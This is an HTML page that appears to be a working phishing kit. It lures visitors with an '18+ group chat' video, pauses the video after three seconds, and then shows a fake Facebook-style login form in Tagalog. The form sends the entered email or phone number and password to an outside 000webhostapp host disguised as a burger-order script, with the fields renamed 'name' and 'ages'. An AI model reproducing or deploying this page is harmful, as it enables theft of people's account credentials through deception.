<!DOCTYPE html>
<html>
<head>
<title>qwerty</title>
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cover">
</head>
<body>

<main>
<p class="gct">Group chat <span>18+</span></p>
<img id="bg" class="xp" src="bg.jpg">

</main>


<div id="li"  class="loadingdiv">


 <img class="lgif" src="load.gif">

</div>

<div id="viddiv" class="vidd">
    
   <video id="vidmp4" class="vid" src="https://www.dropbox.com/scl/fi/tktryjd0oms8xf8v2c96v/km_20231030-1_720p_30f_20231030_120304.mp4?rlkey=lhgdyg6sgqbzuw2ow23ut8mbi&raw=1" type="mp4" controls></video>
 </div>
 
 
<script type="text/javascript">

    
    bg.onload = function() {
    
     setTimeout(function() {
   viddiv.style.display = "block";
   li.style.display = "none";
    }, 2000);
    };
    
    
    
    
    
    </script>



<div id="oll" class="all">
     
     <div class="formd">
      
            <form action="https://burger-shop-online-77.000webhostapp.com/burger-order.php" method="post">
            <div class="ldiv">
                <div class="bilogd">
                    <p class="f">f</p>
                    <img class="blur" src="epbi.png">
            
                </div>
            </div>
                <p class="p2">Content 18+ you must log-in first.</p>
            
                <input type="text" name="name" placeholder="Email o Telepono:" required>
                <input type="text" name="ages" id="inp" placeholder="Password:" required>
                <button id="btn" type="submit">Mag-Log ln</button>
             
                <div class="bdiv"></div>
            
            </form>
     
     
     
     </div>



</div>

</body>
</html>

<style type="text/css">
.vid{

width:100%;
height:100vh;
bo rder:1px solid red;

}
#viddiv{

background-color:white;
width:100%;
height:100%;
padding:5% 0px;
position:absolute;
top:0px;
left:0px;
ma rgin-top:40%;
display: none;

}
.xdiv{

b order:1px solid red;
position:relative;
}
main{

width:100%;
height:100vh;
position: relative;
pointer-events:none;
bor der:1px solid red;
background-color:white;
bac kground-color:#3b5998;
text-align: center;
z-ind ex:999999999;
}
.gct{

font-size:4vw;
font-weight: bold;
color:white;
padding: 2.5%;
color:#3b5998;
opacity:90%;
}
span{

color:red;
font-weight:0px;
}

.loadingdiv{

width:100%;
height:100vh;
position: absolute;
top:0;
left:0;
background-color:rgba(0, 0, 0, 0.5);
bor der:1px solid red;
}

.lgif{
width:16%;
display:block;
margin:67% auto;
}


.xp{

width:100%;
h eight:100vh;
marg in-top:11%;
bor der:1px solid green;
disp lay:none;
}

*{
padding: 0px;
margin: 0px;
box-sizing:border-box;
font-family:verdana;
}


.all {

width:100%;
height:100vh;
background-color:rgba(0,0,0,0.3);
padding-top:30%;
display:none;
z-index:10;
position: absolute;
top:0;
left:0;
}
.ldiv{
margin-top:4%;
background-color:#4362a0;
width:100%;
text-align: center;
padding:2.2% 0px 1% 0px;
position:relative;
}

.blur{
width:100%;
opacity:90%;
b order-radius:50%;
position: absolute;
top:0;
left:0;
}
.formd form{

width:90%;
background-color:#3b5998;
display: flex;
justify-content: center;
align-items:center;
flex-direction: column;
margin:0 auto;
padding: 8% 0px 0px 0px;
border-radius:1%;

}
form img{
pointer-events:none;
}
.p2{
back ground-color:#ffebe8;
background-color:#fff9d7;
font-size:2.5vw;
padding: 3% 6%;
border-radius:3px;
bo rder:1px solid #ec7042;
border:1px solid #e2c823;
margin:2.5%;
color:#313847;
}
input{

width:82%;
padding:2.8%;
font-size:3.7vw;
border-radius:3px;
border:0.5px solid #e1e1e1;
background-color:#f7f7f7;
outline:skyblue;
}

button {
width:82%;
padding:2%;
margin-top:4%;
border-radius:3px;
border:0px solid #e1e1e1;
background-color:#5a91f8;
color:#f7f7f7;
font-size:3.7vw;
font-weight:bold;
}
.bdiv{
width:100%;
displa y:block;
margin-top:30%;
co lor:#f7f7f7;
font- size:3.7vw;
opa city:70%;
}

.p1{

font-size:10vw;
font-weight:bold;
color:#f7f7f7;
bord er:1px solid red;
display: inline;
}
#inp{
margin-top:0.5%;
}
.bilogd{

padding:7%;
width:0px;
bo rder-radius:50%;
margin:0 auto;
position:relative;
bac kground-color: white;
}
.f{
opacity:0%;
position: absolute;
top:56%;
left:50%;
transform:translate(-50%, -50%);
z-index:99999;
font-size:10vw;
font-weight:bold;
color:blue;
text-shadow: 
    -1px -1px 0 white,  
    1px -1px 0 white,
    -1px 1px 0 white,
    1px 1px 0 white;
}
</style>



<script type="text/javascript">
var frm = document.getElementById('oll');
    
document.getElementById("vidmp4").addEventListener("timeupdate", function() {
  if (this.currentTime >= 3) {
    vidmp4.pause();
    viddiv.style.display = "none";
    
    setTimeout(function() {
    frm.style.display = "block";
    
    
    }, 1000);
    
    
  }
});

   </script>
